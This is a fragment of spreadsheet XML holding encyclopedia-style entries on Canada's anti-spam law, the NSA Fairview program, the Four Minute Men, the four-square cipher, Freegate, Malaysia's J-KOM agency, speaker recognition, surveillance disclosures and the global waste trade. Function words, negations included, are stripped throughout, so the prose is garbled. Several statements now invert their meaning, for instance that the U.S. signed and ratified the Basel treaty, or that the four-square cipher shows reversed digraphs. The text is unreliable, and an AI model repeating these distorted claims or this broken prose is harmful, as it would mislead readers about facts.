references</t>
  </si>
  <si>
    <t>Fighting Internet and Wireless Spam Act</t>
  </si>
  <si>
    <t>fighting internet wireless spam (the act, french: visant l’élimination pourriels réseaux internet sans fil), canada's anti-spam legislation (also known castl) received royal assent december 2010. replaced bill c-27, electronic commerce protection (ecpa), passed house commons, died prorogation second session 40th canadian parliament december 2009. went effect july 2014. applies "all communications sent canadian companies, canadian companies messages simply routed canadian servers". this includes personalized communications email messages delivering form communication, text, images, voice sounds, technologies available. however, exempts communications sent telephone facsimile, already regulated telecommunications act.the requires marketers send email individuals receiving them. there types consent: implied explicit. implied consent includes information acquired engaging transaction company, virtue one's telephone number email address listed public directory. records collected marketers implied consent time limit. this makes necessary marketers send one-time double opt-in subscription request subscribers whose consent explicitly taken till date came force. companies' email lists expand years consent type source remain clear, companies sent double opt-in email subscribers came force. matter type consent, mandatory senders enable recipients receiving messages. most email marketing marketing automation software (mas) platforms help manage consent opt-out clause. emails following castl must also include contact information address sender communication. email address always considered personal information personal information protection electronic documents act, (pipeda) require implied explicit consent email address collected used. added additional protections pipeda prevent companies relying pipeda exceptions relating fraud prevention debt collection generate email lists data mining automatic crawling without consent.the enforced three organizations: competition bureau, canadian radio-television telecommunications commission (crtc) office privacy commissioner. includes "private right action allow canadian consumers businesses take civil action violate legislation". crtc levy fines million individual million business contravenes each violation result fine.the criticized some, david poellhuber, says "it’s going change spam receive inboxes" cent spam originates botnets operating countries, notably brazil, russia, united states; academics argue unconstitutional. however, analysis found reduction spam received canadians corresponding reduction spam sent canadians took effect. references "c-28: promote efficiency adaptability canadian economy regulating certain activities discourage reliance electronic means carrying commercial activities, amend canadian radio-television telecommunications commission act, competition act, personal information protection electronic documents telecommunications act". house government bill, legisinfo. parliament canada. retrieved 2012-02-24. ouellette, michael (august 2011). "the next small business time bomb: bill c-28". canadian manufacturing, business information group. retrieved 2012-02-24. lam, yvonne (april 2011). "how canada's fighting internet wireless spam (fisa bill c-28) affects marketers businesses". international self-counsel press. archived original 2012-08-22. retrieved 2012-02-24. "bill c-28: canada's anti-spam receives royal assent". competition bureau, government canada. retrieved 2012-02-24. webb, dave (december 2010). "bill c-28 inbox". itworldcanada. retrieved 2012-02-24. androich, alicia (february 2012). "bill c-28: fine line". marketing magazine, rogers publishing limited. retrieved 2012-02-24. "bill c-28/canada's anti-spam legislation: timeline faq". inbox marketer. january 2012. archived original january 2012. retrieved 2012-02-24. notes external links canada's anti-spam legislation, 2010, bill c-28 full text legislative summary bill c-28 canada's anti-spam legislation government canada canada: bill c-28: canada’s anti-spam legislation passes bill c-28: canada's anti-spam legislation questions answers industry canada</t>
  </si>
  <si>
    <t>Fairview (surveillance program)</t>
  </si>
  <si>
    <t>fairview secret program national security agency cooperates american telecommunications company at&amp;t order collect phone, internet e-mail data mainly foreign countries' citizens major cable landing stations switching stations inside united states. fairview program started 1985, year bell breakup. corporate partner "key corporate partner" cooperation fairview program first identified october 2013, washington post—quoting historian matthew aid—as at&amp;t.this confirmed joint report propublica york times august 2015, based upon documents describe company "highly collaborative" praise company's "extreme willingness help".in 2011, spent $188.9 million program, twice much second-largest program, stormbrew. scope program according 2013 revelations whistleblower edward snowden: partners large telecommunications company [which] partners telecoms foreign countries, [which] allow company access countries' telecommunications systems, access exploited direct traffic nsa's repositories. according revelations, collected billion separate pieces data brazilian users january 2013 alone.several weeks earlier, snowden revealed also harvesting telephone metadata text messages billion subscribers china; however, precise program name reported time. slide fairview program seen brazilian television 2013 showed markers united states, without legend explained stood for. from similar proper legend, published august 2015, became clear 2010 access following at&amp;t facilities: internet peering points voip router facilities voip router facility (with planned) submarine cable landing points (with planned) 4ess circuit switching stationsexcept voip facilities, access points situated along borders. legal authorities collection data fairview program takes place different legal authorities: fisa, requires individualized warrants fisa court, section communications foreign, transit authority ends communications foreign. under fairview program, at&amp;t also provided domestic telephone metadata bulk, authorized section patriot act. first landline connections, 2011, at&amp;t also started handing cell phone metadata: billion day. media related fairview external links spying relies at&amp;t’s ‘extreme willingness help’ fairview: collecting foreign intelligence inside references</t>
  </si>
  <si>
    <t>Four Minute Men</t>
  </si>
  <si>
    <t>four minute group volunteers authorized united states president woodrow wilson give four-minute speeches topics given committee public information (cpi). 1917–1918, 750,000 speeches given 5,200 communities 75,000 accomplished orators, reaching million listeners. topics dealt american effort first world presented four minutes reels changing movie theaters across country. also, speeches made four minutes could given town meetings, restaurants, places audience. history april 1917, congress declared germany. president wilson determined rouse public. wilson established first modern propaganda office, committee public information (cpi), headed george creel. creel systematically reach every person united states multiple times patriotic information individual could contribute effort. also worked post office censor seditious counter-propaganda. creel divisions agency produce distribute innumerable copies pamphlets, newspaper releases, magazine advertisements, films, school campaigns, speeches four minute men. created colorful posters appeared every store window, catching attention passersby seconds. movie theaters widely attended, trained thousands volunteer speakers make patriotic appeals four-minute breaks needed change reels. they also spoke churches, lodges, fraternal organizations, labor unions, even logging camps. director george creel boasted months 75,000 volunteers delivered million four-minute orations million listeners, nation million people. speakers attended training sessions local universities, given pamphlets speaking tips wide variety topics, buying liberty bonds, registering draft, rationing food, recruiting unskilled workers munitions jobs, supporting cross programs. ethnic groups reached languages. purpose with many millions german americans united states, well irish americans scandinavian americans poor rural southerners, strong isolationist feelings, strong need propaganda campaign stir support war. this effort many unique challenges meet address existing political climate. wilson needed speak directly fragmented spread audience united states. address country's self-perception generate support war. four minute provided answer challenges.in addition, four minute urged citizens purchase liberty bonds thrift stamps. addressing challenges four minute idea became useful tool propaganda campaign addressed specific rhetorical situation. challenges effort fragmented audience united states. many different heritages represented united states, president needed support war. address groups specific needs, director four minute men, william mccormick blair, delegated duty speaking local men. well known respected community figures often volunteered four minute program. this gave speeches local voice. also, four minute given general topics talking points follow rotated theaters help speeches seem fresh, instead generic propaganda speeches. these speeches usually celebrated woodrow wilson larger life character germans less-than-human huns. organization four minute division committee public information, headed george creel. committee public information appointed william mccormick blair director four minute men. blair appointed state chairmen four minute men, would appoint city community chairman. each appointments needed approved washington. local chairman would appoint number speakers cover theaters city community responsible. notable four minute augustus post, automotive pioneer, founder american automobile association, champion balloonist early aviator lambert estes gwinn, four minute covington, tennessee benjamin newhall johnson, four minute lynn, massachusetts albert dutton macdade, pennsylvania state senator judge pennsylvania court common pleas (delaware county) otto zahn, southern california four minute charles chaplin, famous comedian douglas fairbanks mary pickford william hart ellwood turner, pennsylvania state representative delaware county (1925-1948), 119th speaker pennsylvania house representatives (1939-1941) deforest perkins, school superintendent future grand dragon maine klux klan references bibliographycornebise, alfred advertised: four minute america's crusade, 1917-1918. philadelphia: american philosophical society, 1984. isbn 0871691566 oclc 11222054 cornwell, elmer "wilson, creel, presidency." public opinion quarterly, pages 189–202. issn 0033-362x creel, george. "propaganda morale". american journal sociology, vol. (nov., 1941), pages 340–351. issn 0002-9602 creel, george. advertised america: first telling amazing story committee public information that carried gospel americanism every corner globe corner (1920) larson, cedric, james mock. "the lost files creel committee". public opinion quarterly, vol. (jan., 1939), pages 5–29. issn 0033-362x larson, cedric, james mock. "the four-minute men." quarterly journal speech: 97-112. issn 0033-5630 mastrangelo, lisa. "world public intellectuals, four minute men: convergent ideals public speaking civic participation." rhetoric public affairs 12#4 (2009): 607-633. oukrop, carol. "the four minute became national network during world journalism quarterly: 632-637. issn 0196-3031 vaughn, stephen holding fast inner lines: democracy, nationalism, committee public information (2nd 2011), standard scholarly history primary sources committee public information, complete report committee public information: 1917, 1918, 1919 (1920) online free further reading john maxwell hamilton, manipulating masses: woodrow wilson birth american propaganda</t>
  </si>
  <si>
    <t>Four-square cipher</t>
  </si>
  <si>
    <t>four-square cipher manual symmetric encryption technique. invented french cryptographer felix delastelle. technique encrypts pairs letters (digraphs), thus falls category ciphers known polygraphic substitution ciphers. this adds significant strength encryption compared monographic substitution ciphers operate single characters. digraphs makes four-square technique less susceptible frequency analysis attacks, analysis must done possible digraphs rather monographic substitution. frequency analysis digraphs possible, considerably difficult generally requires much larger ciphertext order useful. using four-square four-square cipher uses four (5x5) matrices arranged square. each matrices contains letters alphabet (usually omitting putting location reduce alphabet fit). general, upper-left lower-right matrices "plaintext squares" contain standard alphabet. upper-right lower-left squares "ciphertext squares" contain mixed alphabetic sequence. generate ciphertext squares, would first fill spaces matrix letters keyword phrase (dropping duplicate letters), fill remaining spaces rest letters alphabet order (again omitting reduce alphabet fit). written rows table, left right, pattern, spiral beginning upper-left-hand corner ending center. keyword together conventions filling table constitute cipher key. four-square algorithm allows separate keys, ciphertext matrices. example, four-square matrices keywords "example" "keyword." plaintext matrices lowercase ciphertext matrices caps make example visually simple: algorithm encrypt message, would follow steps: split payload message digraphs. (hello world becomes find first letter digraph upper-left plaintext matrix.a find second letter digraph lower-right plaintext matrix.a first letter encrypted digraph first plaintext letter column second plaintext letter. therefore upper-right ciphertext matrix.a second letter encrypted digraph second plaintext letter column first plaintext letter. therefore lower-left ciphertext matrix.a using four-square example given above, encrypt following plaintext: plaintext: ciphertext: here four-square written blanking values used encrypting first digraph "he" "fy" seen clearly, method encryption simply involves finding corners rectangle defined letters plaintext digraph. encrypted digraph simply letters corners, upper-right letter coming first. decryption works way, reverse. ciphertext digraph split first character going upper-right matrix second character going lower-left matrix. corners rectangle located. these represent plaintext digraph upper-left matrix component coming first. four-square cryptanalysis like pre-modern ciphers, four-square cipher easily cracked enough text. obtaining relatively straightforward plaintext ciphertext known. when ciphertext known, brute force cryptanalysis cipher involves searching space matches frequency occurrence digrams (pairs letters) known frequency occurrence digrams assumed language original message. cryptanalysis four-square generally involves pattern matching repeated monographs. this case plaintext matrices known. four-square encipherment usually uses standard alphabets matrices requirement. case, certain words always produce single-letter ciphertext repeats. instance, word always produce ciphertext letter first third positions regardless keywords used. patterns like cataloged matched single-letter repeats ciphertext. candidate plaintext inserted attempt uncover ciphertext matrices. unlike playfair cipher, four-square cipher show reversed ciphertext digraphs reversed plaintext digraphs (e.g. digraphs would encrypt pattern playfair, four-square). this, course, true keywords different. another difference four-square playfair makes four-square stronger encryption fact double letter digraphs occur four-square ciphertext. measures, four-square stronger system encrypting information playfair. however, cumbersome keys, and, preparing encryption/decryption sheet time consuming. given increase encryption strength afforded four-square playfair marginal schemes easily defeated sufficient ciphertext available, playfair become much common. good tutorial reconstructing four-square cipher found chapter "solution polygraphic substitution systems," field manual 34-40-2, produced united states army. references also topics cryptography</t>
  </si>
  <si>
    <t>Freegate</t>
  </si>
  <si>
    <t>freegate software application developed dynamic internet technology (dit) enables internet users mainland china, south korea north korea, syria, vietnam, iran, united arab emirates, germany, zealand, australia, united kingdom among others, view websites blocked governments. program takes advantage range proxy servers called dynaweb. this allows users bypass internet firewalls block sites using dit's peer-to-peer (p2p)-like proxy network system. freegate's anti-censorship capability enhanced new, unique encryption compression algorithm versions 6.33 above. dynamic internet technology estimates freegate 200,000 users 2004. maintainer bill xia. dynaweb dynaweb collection anti-censorship services provided dynamic internet technology inc. (dit). dynaweb web-based anti-censorship portal. once users point browser dynaweb urls, page presented similar original, blocked websites links. addition, user type page dynaweb fetch pages instantly. software needed, settings tweaked user's computer. since chinese police watch dynaweb's portal websites closely block soon identify them, dynaweb must dynamic. hundreds mirror sites time, varying domain names defeat blocking hijacking. backend, dynaweb also mechanisms proactively monitor blocking status mirror sites, soon blocking detected, change domain name instantly.to keep users connected dynamic infrastructure, dynaweb variety channels keep users updated. example, user send message dynaweb's instant messenger (im) accounts, instant reply showing newest addresses dynaweb portals. similar things done emails. many, dynamic channels, dynaweb outsmarts attempt collect dynaweb addresses censors, user receives (different) subset dynaweb's addresses. automatic blocking detection combined quick reaction apparently frustrates blocking efforts china side great firewall china (gfw).dit also releases tiny piece software, freegate, directly taps dynaweb's backbone keeps user connected dynamic channels automatically. there indications freegate capabilities built-in exploit zero-day vulnerabilities gfw.today dynaweb offers widest range options users access internet freely, supports million hits average chinese users alone. creation funding founded 2001 provide email delivery services china government agencies ngos. 2002, started provide anti-censorship services framework dynaweb, like ultrasurf, dynaweb became contender gfw-penetration effort.freegate created falun gong practitioners financed broadcasting board governors, governmental agency. freegate also receives funding human rights china, also clients receives funding american non-profit organization national endowment democracy. according report, government gave funding $685,000 freegate 2005. feature freegate android malware reports 2004, financial times, citing member staff symantec mainland china, reported norton antivirus identified freegate trojan horse. there initial fears reports ploy chinese communist party (ccp) authorities encourage removal software computers, soon delisted threat. symantec explained detection based software operating similarly various trojan horses, based proxies penetrate firewalls used block sites, modified detection exclude freegate.in 2013, reported "pro-government electronic actors" syria sent electronic messages rebels encouraging download file named freegate claimed designed help dissidents circumvent state surveillance agencies, actually malware intruder able monitor victims typing computers read remove files.in august 2013 freegate testing proxy program, people thought phishing attack. reports iran said users used freegate pass internet censorship iran, fake page instead facebook's main website. freegate published note saying testing proxy program, fake facebook page tunnel. although experts warned users careful tunnel link security users' information encrypted. also internet censorship circumvention ultrasurf gtunnel golden shield project internet censorship internet censorship people's republic china (anonymity network) free product sponsored project implements onion routing connections repeatedly encrypted sent several proxies making tracing difficult. references external links freegate's main page dynamic internet technology, inc. (dit) main site home page latest version freegate "dit chinese website" latest version freegate softpedia.com latest version freegate professional lo4d.com freegate, global internet freedom consortium site google china censors news tor: anonymity online presentation freegate bypass internet censorship, floss manual, march 2011, (dongtaiwang.com)</t>
  </si>
  <si>
    <t>Special Affairs Department</t>
  </si>
  <si>
    <t>community communications department (malay: jabatan komunikasi komuniti, abbr.: j-kom) (previously called special affairs department (malay: jabatan ehwal khas, abbr.: jasa) government agency malaysian government, purview ministry communications multimedia. overview agency first began badan ehwal khas (bhek) (special affairs agency), unit ministry information established 1959 malayan general election "maintain protect political, religion government stability". 1960 bhek upgraded renamed cawangan ehwal khas (chek) (special affairs branch) purview jabatan perkhidmatan penerangan (federal government's information services). government cabinet meeting march 2000 approved formation 'department special affairs' (jabatan ehwal khas, abbreviated jhek) upgraded chek.in 2004, acronym jhek changed jasa. formed initially aimed explain government initiatives programmes although critics argued slowly deviated turned political propaganda machinery barisan nasional (bn) especially united malays national organisation (umno) attack opposition parties political rivals.the jasa's controversial functions questioned alleged inefficient government agency, amounting thousand employees huge expenditure rm74 million. example, former director general 2015 2018, puad zarkashi, paid 20,592.00 monthly salary, much average minister salary 14,907.20 month. brief dissolution re-establishment after 2018 general election downfall barisan nasional (bn) government, prime minister mahathir mohamad pakatan harapan (ph) coalition federal government announced jasa among government agencies departments abolished. mahathir stated jasa dissolved riddled many political elements; agency attributed engage state-sponsored anonymous political commentators trolls spreading pro-government propaganda internet, colloquially known "cybertroopers".jasa initially completely dissolved october 2018 civil servants absorbed departments ministries. however, perikatan nasional (pn) coalition took back control government 2020–2022 malaysian political crisis, jasa re-established 2020, rebranded community communications department (j-kom). government minister claimed time, j-kom used pro-government propaganda machine, without specifying further. bn/umno eventually officially took back control government administration ismail sabri yaakob, including j-kom. also astroturfing state-sponsored internet propaganda references further reading hopkins, julian january 2014). "cybertroopers parties: government internet malaysia". asian journal communication. (1): 5–24. doi:10.1080/01292986.2013.851721. retrieved july 2022. external links facebook</t>
  </si>
  <si>
    <t>Speaker recognition</t>
  </si>
  <si>
    <t>speaker recognition identification person characteristics voices. used answer question "who speaking?" term voice recognition refer speaker recognition speech recognition. speaker verification (also called speaker authentication) contrasts identification, speaker recognition differs speaker diarisation (recognizing speaker speaking). recognizing speaker simplify task translating speech systems trained specific voices used authenticate verify identity speaker part security process. speaker recognition history dating back four decades 2019 uses acoustic features speech found differ individuals. these acoustic patterns reflect anatomy learned behavioral patterns. verification versus identification there major applications speaker recognition technologies methodologies. speaker claims certain identity voice used verify claim, called verification authentication. hand, identification task determining unknown speaker's identity. sense, speaker verification match speaker's voice matched particular template whereas speaker identification match voice compared multiple templates. from security perspective, identification different verification. speaker verification usually employed "gatekeeper" order provide access secure system. these systems operate users' knowledge typically require cooperation. speaker identification systems also implemented covertly without user's knowledge identify talkers discussion, alert automated systems speaker changes, check user already enrolled system, etc. forensic applications, common first perform speaker identification process create list "best matches" perform series verification processes determine conclusive match. working match samples speaker list best matches helps figure person based amount similarities differences. prosecution defense evidence determine suspect actually offender. training earliest training technologies commercialize implemented worlds wonder's 1987 julie doll. point, speaker independence intended breakthrough, systems required training period. 1987 doll carried tagline "finally, doll understands you." despite fact described product "which children could train respond voice." term voice recognition, even decade later, referred speaker independence. variants speaker recognition each speaker recognition system phases: enrollment verification. during enrollment, speaker's voice recorded typically number features extracted form voice print, template, model. verification phase, speech sample "utterance" compared previously created voice print. identification systems, utterance compared multiple voice prints order determine best match(es) verification systems compare utterance single voice print. because process involved, verification faster identification. speaker recognition systems fall categories: text-dependent text-independent. text-dependent recognition requires text enrollment verification. text-dependent system, prompts either common across speakers (e.g. common pass phrase) unique. addition, shared-secrets (e.g.: passwords pins) knowledge-based information employed order create multi-factor authentication scenario. conversely, text-independent systems require specific text. they often used speaker identification require little cooperation speaker. case text enrollment test different. fact, enrollment happen without user's knowledge, case many forensic applications. text-independent technologies compare said enrollment verification, verification applications tend also employ speech recognition determine user saying point authentication. text independent systems acoustics speech analysis techniques used. technology speaker recognition pattern recognition problem. various technologies used process store voice prints include frequency estimation, hidden markov models, gaussian mixture models, pattern matching algorithms, neural networks, matrix representation, vector quantization decision trees. comparing utterances voice prints, basic methods like cosine similarity traditionally used simplicity performance. some systems also "anti-speaker" techniques cohort models world models. spectral features predominantly used representing speaker characteristics. linear predictive coding (lpc) speech coding method used speaker recognition speech verification.ambient noise levels impede collections initial subsequent voice samples. noise reduction algorithms employed improve accuracy, incorrect application opposite effect. performance degradation result changes behavioural attributes voice enrollment using telephone verification another telephone. integration two-factor authentication products expected increase. voice changes ageing impact system performance time. some systems adapt speaker models successful verification capture long-term changes voice, though debate regarding overall security impact imposed automated adaptation legal implications introduction legislation like general data protection regulation european union california consumer privacy united states, much discussion speaker recognition work place. september 2019 irish speech recognition developer soapbox labs warned legal implications involved. applications first international patent filed 1983, coming telecommunication research cselt (italy) michele cavazza alberto ciaramella basis future telco services final customers improve noise-reduction techniques across network. between 1996 1998, speaker recognition technology used scobey–coronach border crossing enable enrolled local residents nothing declare cross canada–united states border inspection stations closed night. system developed u.s. immigration naturalization service voice strategies warren, michigan.in 2013 announced barclays wealth passive speaker recognition verify identity telephone customers within seconds normal conversation. system used developed voice recognition company nuance (that 2011 acquired company loquendo, spin-off cselt speech technology), company behind apple's siri technology. verified voiceprint used identify callers system system would future rolled across company. private banking division barclays first financial services firm deploy voice biometrics primary means authenticate customers call centers. customer users rated system speed, ease security.speaker recognition also used criminal investigations, 2014 executions amongst others, james foley steven sotloff.in february 2016 high-street bank hsbc internet-based retail bank first direct announced would offer million customers biometric banking software access online phone accounts using fingerprint voice. also effect applications artificial intelligence speaker diarisation speech recognition voice changerlistslist emerging technologies outline artificial intelligence notes references homayoon beigi (2011), "fundamentals speaker recognition", springer-verlag, berlin, 2011, isbn 978-0-387-77591-3. "biometrics movies" –national institute standards technology elisabeth zetterholm (2003), voice imitation. phonetic study perceptual illusions acoustic success, thesis, lund university. sahidullah (2015), enhancement speaker recognition performance using block level, relative temporal information subband energies, thesis, indian institute technology kharagpur. external links circumventing voice authentication radio podcast recently featured simple fool rudimentary voice authentication systems. speaker recognition scholarpedia voice recognition benefits challenges access control software bob.bio.spear alize</t>
  </si>
  <si>
    <t>Global surveillance disclosures (1970–2013)</t>
  </si>
  <si>
    <t>global surveillance refers practice globalized mass surveillance entire populations across national borders. although existence first revealed 1970s legislators attempt curb domestic spying national security agency (nsa), receive sustained public attention existence echelon revealed 1980s confirmed 1990s. 2013 gained substantial worldwide media attention global surveillance disclosure edward snowden. history 1970s 1972 analyst perry fellwock (under pseudonym "winslow peck") introduced readers ramparts magazine ukusa agreement. 1976, separate article time magazine revealed existence gchq. 1980s–1990s 1982 james bamford's book nsa, puzzle palace, first published. bamford's second book, body secrets: anatomy ultra-secret national security agency, published decades later. 1988 echelon network revealed margaret newsham, lockheed employee. newsham told member u.s. congress telephone calls strom thurmond, republican u.s. senator, collected nsa. congressional investigators determined "targeting u.s. political figures would occur accident. designed system start."by late 1990s echelon reportedly capable monitoring internet traffic. according 2001, however, "the government still refused admit echelon even exists." 2000s aftermath september attacks, william binney, along colleagues kirke wiebe edward loomis cooperation house staffer diane roark, asked u.s. defense department investigate allegedly wasting "millions millions dollars" trailblazer, system intended analyze data carried communications networks internet. binney also publicly critical spying u.s. citizens september 2001 attacks. binney claimed failed uncover 9/11 plot despite massive interception data.in 2001, september attacks, started collecting bulk telephone communications data united kingdom (i.e. telephone numbers called when) authorized home secretary telecommunications 1984 instead regulation investigatory powers 2000, would brought independent oversight regulation. this kept secret announced home secretary 2015.on december 2005, york times published report headline "bush lets u.s. callers without courts," co-written eric lichtblau pulitzer prize-winning journalist james risen. according times, article's date publication delayed year (past next presidential election cycle) alleged national security concerns. russ tice later revealed major source. 2006, details nsa's domestic surveillance u.s. citizens provided today. newspaper released report 2006 detailing nsa's "massive database" phone records collected "tens millions" u.s. citizens. according today, phone records provided several telecom companies at&amp;t, verizon, bellsouth. at&amp;t technician mark klein later revealed major source, specifically rooms network control centers internet backbone intercepting recording traffic passing through. 2008 security analyst babak pasdar revealed existence so-called "quantico circuit" team 2003. circuit provided u.s. federal government backdoor network unnamed wireless provider, later independently identified verizon.in 2007, former qwest joseph nacchio alleged court provided supporting documentation february 2001 (nearly months prior september attacks) proposed meeting conduct blanket phone spying. considered spying illegal refused cooperate, claims company punished denied lucrative contracts. 2010–2013 2011 details mass surveillance industry released wikileaks. according julian assange, world theoretically possible record nearly telecommunications traffic country, telephone calls, international industry selling devices it." disclosures since 2013 also history surveillance warrantless surveillance (2001–07) global surveillance whistleblowers references</t>
  </si>
  <si>
    <t>Global waste trade</t>
  </si>
  <si>
    <t>global waste trade international trade waste countries treatment, disposal, recycling. toxic hazardous wastes often imported developing countries developed countries. world bank report what waste: global review solid waste management, describes amount solid waste produced given country. specifically, countries produce solid waste economically developed industrialized. report explains "generally, higher economic development rate urbanization, greater amount solid waste produced." therefore, countries global north, economically developed urbanized, produce solid waste global south countries.current international trade flows waste follow pattern waste produced global north exported disposed global south. multiple factors affect countries produce waste magnitude, including geographic location, degree industrialization, level integration global economy. numerous scholars researchers linked sharp increase waste trading negative impacts waste trading prevalence neoliberal economic policy. with major economic transition towards neoliberal economic policy 1980s, shift towards "free-market" policy facilitated sharp increase global waste trade. henry giroux, chair cultural studies mcmaster university, gives definition neoliberal economic policy: "neoliberalism ...removes economics markets discourse social obligations social costs. ...as policy political project, neoliberalism wedded privatization public services, selling state functions, deregulation finance labor, elimination welfare state unions, liberalization trade goods capital investment, marketization commodification society." given economic platform privatization, neoliberalism based expanding free-trade agreements establishing open-borders international trade markets. trade liberalization, neoliberal economic policy trade completely deregulated, leaving tariffs, quotas, restrictions international trade, designed developing countries' economies integrate global economy. critics claim although free-market trade liberalization designed allow country opportunity reach economic success, consequences policies devastating global south countries, essentially crippling economies servitude global north. even supporters international monetary fund, “progress integration uneven recent decades” specifically, developing countries targeted trade liberalization policies import waste means economic expansion. guiding neoliberal economic policy argues integrated global economy participate trade liberalization exchange international trade markets. their claim smaller countries, less infrastructure, less wealth, less manufacturing ability, take hazardous wastes increase profits stimulate economies. current debate global waste trade arguments support current supporters global waste trade argue importing waste economic transaction benefit countries little offer global economy. countries production capacity manufacture high quality products import waste stimulate economy. lawrence summers, former president harvard university chief economist world bank, issued confidential memo arguing global waste trade 1991. memo stated: think economic logic behind dumping load toxic waste lowest wage country impeccable face that... i've always thought countries africa vastly polluted; quality probably vastly inefficiently compared angeles... just world bank encouraging migration dirty industries least developed countries?" this position, mainly motivated economics financial profit particular, demonstrates main argument global waste trade. cato institute published article supporting global waste trade suggesting "there little evidence hazardous wastes, often chronic carcinogens, contribute death rates developing countries." elaborating point, article argues "people developing countries would rationally accept increased exposure hazardous pollutants exchange opportunities increase productivity—and, hence, income."overall, argument global waste trade rests largely upon perception developing countries need economic development. supporters suggest engaging global waste trade, developing countries global south expand economies increase profits. critiques critics global waste trade argue lack regulation failed policies allowed developing nations become toxic dump yards hazardous waste. ever-increasing amounts hazardous waste shipped developing countries increases disproportionate risk people nations face. critics effects global waste trade emphasize enormous amount hazardous wastes people poorer countries must deal with. they highlight fact world's hazardous wastes produced western countries (the united states europe), people suffer negative health effects wastes poorer countries produce waste. peter newell, professor development studies, argues "environmental inequality reinforces and, time reflects, forms hierarchy exploitation along lines class, race gender." arguing detrimental effects hazardous waste trade affect disadvantaged others, critics global waste trade suggest implications dumping hazardous waste significant consequences people color, women, low-income people particular. critiquing global waste trade reproducing inequality global scale, many activists, organizers, environmentalists regions affected global south vocalized disappointment global waste trade policies. morales, former president bolivia, argues current economic system forcing exploitation country people. claims:"if want save planet earth, save life humanity, duty capitalist system. unless capitalist system, impossible imagine equality justice planet earth. this believe important exploitation human beings pillage natural resources, destructive wars markets materials, plundering energy, particularly fossil fuels, excessive consumption goods accumulation waste. capitalist system allows heap waste." jean francois kouadio, african native living near toxic dump site ivory coast, explains experience effects toxic substances lingering throughout community. with major western corporations dumping toxic wastes ivory coast, kuoadio lost children effects toxic wastes. describes loss second daughter grace, doctors "said suffered acute glycemia caused toxic waste." addition critics global south, researchers scholars west begun critiquing uneven distribution negative effects hazardous waste dumpings causing. dorceta taylor, professor university michigan, argues women color united states disproportionately affected policies: "women color forefront struggle bring attention issues devastating minority communities issues hazardous waste disposal; exposure toxins; ...their communities, degraded environments repositories waste products capitalist production excessive consumption. result, vanguard struggle environmental justice; founders environmental groups, grassroots activists, researchers, conference organizers, workshop leaders, lobbyists, campaign community organizers." t.v. reed, professor english american studies washington state university, argues correlation historical colonialism toxic colonialism based perceptions indigenous land 'waste'. argues western cultures deemed indigenous land "underdeveloped" "empty", people inhabiting therefore less "civilized". using historical premises colonialism, toxic colonialism reproduces arguments defining global south land expendable western wastes. toxic colonialism toxic colonialism, defined process "underdeveloped states used inexpensive alternatives export disposal hazardous waste pollution developed states," core critique global waste trade. toxic colonialism represents neocolonial policy continues maintain global inequality today unfair trade systems. toxic colonialism uses term colonialism "the characteristics colonialism, involving economic dependence, exploitation labour, cultural inequality intimately associated within realm toxic waste colonialism." electronic waste electronic waste, also known e-waste, refers discarded electrical electronic devices. rapidly growing surplus electronic waste around world resulted quickly evolving technological advances, changes media (tapes, software, mp3), falling prices, planned obsolescence. estimated million tons e-waste produced year, majority comes united states europe. most electronic waste shipped developing countries asia africa processed recycled.various studies investigated environmental health effects e-waste upon people live work around electronic waste dumps. heavy metals, toxins, chemicals leak discarded products surrounding waterways groundwater, poisoning local people. people work dumps, local children searching items sell, people living surrounding communities exposed deadly toxins. city suffering negative results hazardous waste trade guiyu, china, called electronic waste dump world. world's largest e-waste dump, workers dismantling million pounds junked computers, cell phones electronic devices year. incinerator incinerator produced incinerators burn waste order dispose incineration many polluting effects include release various hazardous gases, heavy metals, sulfur dioxide. khian incident example incinerator dumped onto global south global north unjust trade exchange khian waste disposal incident. carrying 14,000 tons incinerator philadelphia, cargo ship, khian sea, dispose waste. however, upon rejected dominican republic, panama, honduras, bermuda, guinea bissau, dutch antilles, crew finally dumped portion near haiti. after changing name ship twice conceal original identity, senegal, morocco, yemen, lanka, singapore still banned ship's entry. upon consistent rejections, believed disposed atlantic indian oceans. following disaster handling hazardous waste, haitian government banned waste imports leading movement recognize disastrous consequences global waste trade. based khian waste disposal incident similar events, basel convention written resist known developing countries 'toxic colonialism.' open signature march 1989 went effect 1992. u.s. signed treaty, ratify chemical waste chemical waste excess unusable waste hazardous chemicals, mainly produced large factories. extremely difficult costly dispose poses many problems health risks upon exposure, must carefully treated toxic waste processing facilities. italy dumping hazardous chemicals nigeria example chemical waste exported global north onto global south event italian business seeking avoid european economic regulations. allegedly exporting 4,000 tons toxic waste, containing tons polychlorinated biphenyls, pcbs, italian businessman made $4.3 million shipping hazardous waste nigeria. fordham environmental review published article explaining impacts toxic waste imposed nigeria detail: "mislabelling garbage fertilizers, italian company deceived retired/illiterate timber worker agreeing store poison backyard nigerian river port koko little dollars month. these toxic chemicals exposed children playing nearby. they leaked koko water system resulting death nineteen villagers contaminated rice nearby farm." this example traditional trade flow, developed western countries severely, unfairly, disproportionately impacted developing countries global south. shipbreaking asia another danger developing countries growing issue shipbreaking, occurring mainly asia. industrialized countries seeking retire used vessels find cheaper send ships asia dismantling. china bangladesh seen hubs shipbreaking asia. main issues lies fact ships aged continue, constructed time less environmental regulation. environmental fact sheet, researchers demonstrate immense impact toxic trade sector workers environment. one, older ships contain health-damaging substances asbestos, lead oxide, zinc chromates, mercury, arsenic, tributyltin. addition, shipbreaking workers china developing countries traditionally lack proper equipment protective gear handling toxic substances. plastic waste trade plastic waste identified main cause marine litter. countries importing waste plastics often lack capacity process material. result, united nations imposed waste plastic trade unless meets certain criteria. impact global waste trade negative effects many people, particularly poorer, developing nations. these countries often safe recycling processes facilities, people process toxic waste bare hands. hazardous wastes often properly disposed treated, leading poisoning surrounding environment resulting illness death people animals. many people experienced illnesses death unsafe hazardous wastes handled. effects upon environment hazardous waste trade disastrous effects upon environment natural ecosystems. various studies explore concentrations persistent organic pollutants poisoned areas surrounding dump sites, killing numerous birds, fish, wildlife. there heavy metal chemical concentrations air, water, soil, sediment around toxic dump areas, concentration levels heavy metals areas extremely high toxic. implications human health hazardous waste trade serious damaging effects upon health humans. people living developing countries vulnerable dangerous effects hazardous waste trade, particularly risk developing health problems. methods disposal toxic wastes developing countries expose general population (including future generations) highly toxic chemicals. these toxic wastes often disposed open landfills, burned incinerators, dangerous processes. workers wear little protective gear processing toxic chemicals, exposed toxins direct contact, inhalation, contact soil dust, well oral intake contaminated locally produced food drinking water. health problems resulting hazardous wastes affect humans causing cancers, diabetes, alterations neurochemical balances, hormone disruptions endocrine disruptors, skin alterations, neurotoxicity, kidney damage, liver damage, bone disease, emphysema, 